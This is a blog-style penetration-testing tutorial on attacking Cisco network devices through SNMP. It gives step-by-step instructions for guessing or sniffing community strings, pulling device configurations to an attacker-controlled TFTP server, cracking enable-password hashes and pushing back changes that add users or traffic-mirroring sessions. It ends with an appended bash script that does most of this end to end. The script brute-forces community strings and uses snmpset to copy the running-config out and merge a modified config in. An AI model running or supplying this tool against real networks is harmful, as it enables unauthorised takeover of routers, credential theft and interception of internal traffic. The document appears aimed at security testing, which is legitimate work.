Friday, February 10, 2012

Hacking Cisco with SNMP

Being able to evaluate the strength of a customer's infrastructure is an important part of a penetration test. Many pen testers limit their tests by overlooking the SNMP protocol and the devices that speak it. With a successful discovery of SNMP community strings you can go as far as reconfiguring a device for remote access (SSH, Telnet, HTTP/HTTPS) or setting up a SPAN port to sniff internal traffic. Before we start there are a few things you should know about SNMP:

UDP port 161. Since it's UDP there is no handshake, so scanning and guessing community strings is fast.
Community strings provide either read-only (RO) or read-write (RW) access. Obviously we prefer RW.
SNMPv1 and v2c send the community string in clear text in every packet. v3 adds per-user authentication and, in authPriv mode, encryption; a v3 agent configured noAuthNoPriv is still wide open.
Here is the usual process taken to attack SNMP and the tools that will help you do it.

1) Obtain Community Strings
-Sniff clear text – Wireshark with the capture filter udp port 161 (or the display filter snmp); the community string is visible in every v1/v2c packet
-Guess community strings – onesixtyone, Metasploit (auxiliary/scanner/snmp/snmp_login), snmpblow. Start with public and private, then a wordlist.

2) Set up a TFTP server the device can reach. The device will push its config to you, so the server must accept the write; many daemons (tftpd-hpa, for example) only overwrite files that already exist unless started in create mode, so create the destination filename first.

3) Identify which config-copy MIB the image supports : snmpwalk. IOS 12.0 and later carry CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96); its table is empty until you create a row, so go by the IOS version in sysDescr. Older images use the OLD-CISCO-SYS-MIB objects writeNet (1.3.6.1.4.1.9.2.1.55) and hostConfigSet (1.3.6.1.4.1.9.2.1.53); if a walk of 1.3.6.1.4.1.9.2.1 returns objects such as hostName, that method is available.

4) Download device configs : snmpblow, or snmpset against the MIB found in step 3, which makes the device upload its running-config to your TFTP server. This needs the RW string.

5) Crack enable passwords : John the Ripper, oclHashcat. An enable secret (type 5, $1$...) is salted MD5-crypt: format md5crypt in John, mode 500 in hashcat. Type 7 strings (enable password and line passwords with service password-encryption) are not hashes at all; they are reversibly encoded and decode instantly.

6) Modify the config (for example, add a local user and allow SSH or Telnet on the vty lines, or add a monitor session for the SPAN port).

7) Update the device config : snmpset. A copy to running-config merges your file into the running configuration rather than replacing it, so the file only needs to contain the lines you are adding.
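The procedure above end to end, as an added example that is not from the original post or from any of the tools it names. It drives CISCO-CONFIG-COPY-MIB with the stock net-snmp snmpget/snmpset commands instead of snmpblow, and assumes SNMPv2c, a read-write community string, an IOS image that carries that MIB, and a TFTP server you control; the target, community string, TFTP address and wordlist path are placeholders supplied through environment variables, and nothing touches the network unless SNMP_TARGET is set.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): steps 1-7 with net-snmp against
# CISCO-CONFIG-COPY-MIB. Assumes SNMPv2c, an RW community, IOS 12.0+ and a TFTP
# server of ours reachable from the device. Addresses below are placeholders.
set -u

CCCOPY='1.3.6.1.4.1.9.9.96.1.1.1.1'   # ccCopyEntry; column.row is appended

# Enumerations from the MIB
TFTP=1                                                # ccCopyProtocol
NETWORK_FILE=1; STARTUP_CONFIG=3; RUNNING_CONFIG=4    # ccCopy{Source,Dest}FileType
CREATE_AND_GO=4; DESTROY=6                            # ccCopyEntryRowStatus

# guess_community TARGET WORDLIST: step 1 by hand. Prints the first string that
# answers a sysDescr.0 get. That only proves RO; RW is proven by the copy below.
guess_community() {
  local target=$1 wordlist=$2 c
  while IFS= read -r c; do
    if snmpget -v2c -c "$c" -r 0 -t 1 "$target" 1.3.6.1.2.1.1.1.0 >/dev/null 2>&1; then
      printf '%s\n' "$c"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# copy_varbinds ROW SRC_TYPE DST_TYPE TFTP_IP FILENAME
# Prints the varbinds that create one ccCopyTable row in a single set.
# ROW is an index we pick; it must not already exist on the device.
copy_varbinds() {
  local row=$1 src=$2 dst=$3 tftp=$4 file=$5
  printf '%s.2.%s i %s ' "$CCCOPY" "$row" "$TFTP"           # ccCopyProtocol
  printf '%s.3.%s i %s ' "$CCCOPY" "$row" "$src"            # ccCopySourceFileType
  printf '%s.4.%s i %s ' "$CCCOPY" "$row" "$dst"            # ccCopyDestFileType
  printf '%s.5.%s a %s ' "$CCCOPY" "$row" "$tftp"           # ccCopyServerAddress
  printf '%s.6.%s s %s ' "$CCCOPY" "$row" "$file"           # ccCopyFileName
  printf '%s.14.%s i %s' "$CCCOPY" "$row" "$CREATE_AND_GO"  # ccCopyEntryRowStatus
}

# parse_state SNMPGET_OUTPUT: the integer from a line such as
# "SNMPv2-SMI::enterprises.9.9.96.1.1.1.1.10.111 = INTEGER: 3"
parse_state() {
  printf '%s\n' "$1" | sed -n 's/.*INTEGER: *\([0-9][0-9]*\).*/\1/p'
}

# state_name N: ccCopyState enumeration
state_name() {
  case $1 in
    1) echo waiting ;; 2) echo running ;; 3) echo successful ;; 4) echo failed ;;
    *) echo unknown ;;
  esac
}

# run_copy TARGET COMMUNITY ROW SRC_TYPE DST_TYPE TFTP_IP FILENAME
# Creates the row, polls ccCopyState for up to 30 s, destroys the row, and
# succeeds only if the device reported successful(3).
run_copy() {
  local target=$1 community=$2 row=$3 src=$4 dst=$5 tftp=$6 file=$7
  local state=0 i=0
  # the varbind list is deliberately left unquoted so it splits into arguments
  snmpset -v2c -c "$community" "$target" \
    $(copy_varbinds "$row" "$src" "$dst" "$tftp" "$file") >/dev/null || return 1
  while [ "$i" -lt 30 ]; do
    state=$(parse_state "$(snmpget -v2c -c "$community" "$target" "$CCCOPY.10.$row")")
    [ "$state" = 1 ] || [ "$state" = 2 ] || break   # leave waiting/running
    sleep 1; i=$((i + 1))
  done
  echo "row $row: $(state_name "$state")"
  if [ "$state" = 4 ]; then
    snmpget -v2c -c "$community" "$target" "$CCCOPY.13.$row"   # ccCopyFailCause
  fi
  # Always destroy the row; a leftover row blocks reuse of its index.
  snmpset -v2c -c "$community" "$target" "$CCCOPY.14.$row" i "$DESTROY" >/dev/null
  [ "$state" = 3 ]
}

# Usage (placeholders): SNMP_TARGET=10.0.0.1 TFTP_IP=10.0.0.50 \
#   SNMP_COMMUNITY=private ./snmpcopy.sh     (or SNMP_WORDLIST=strings.txt to guess)
if [ -n "${SNMP_TARGET:-}" ]; then
  : "${TFTP_IP:?set TFTP_IP to the address of your TFTP server}"
  community=${SNMP_COMMUNITY:-$(guess_community "$SNMP_TARGET" "${SNMP_WORDLIST:?}")}
  [ -n "$community" ] || { echo "no community string found" >&2; exit 1; }
  # Step 4: running-config -> router.cfg on our TFTP server
  run_copy "$SNMP_TARGET" "$community" 111 "$RUNNING_CONFIG" "$NETWORK_FILE" "$TFTP_IP" router.cfg
  # Steps 6-7: after editing, merge changes.cfg into the running config.
  run_copy "$SNMP_TARGET" "$community" 112 "$NETWORK_FILE" "$RUNNING_CONFIG" "$TFTP_IP" changes.cfg
fi
```

A network file copied to runningConfig merges, exactly like `copy tftp: running-config` on the console, so changes.cfg need only hold the lines being added; copy to startupConfig (3) instead if the change must survive a reload without a separate write. Remember to create router.cfg on the TFTP server first if the daemon refuses to create new files.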

You can see that these steps are pretty straightforward. Have fun experimenting with the tools. I would HIGHLY discourage attacking SNMP in a production environment unless you have thoroughly experimented with the process in a controlled lab.

Copy & Paste From :
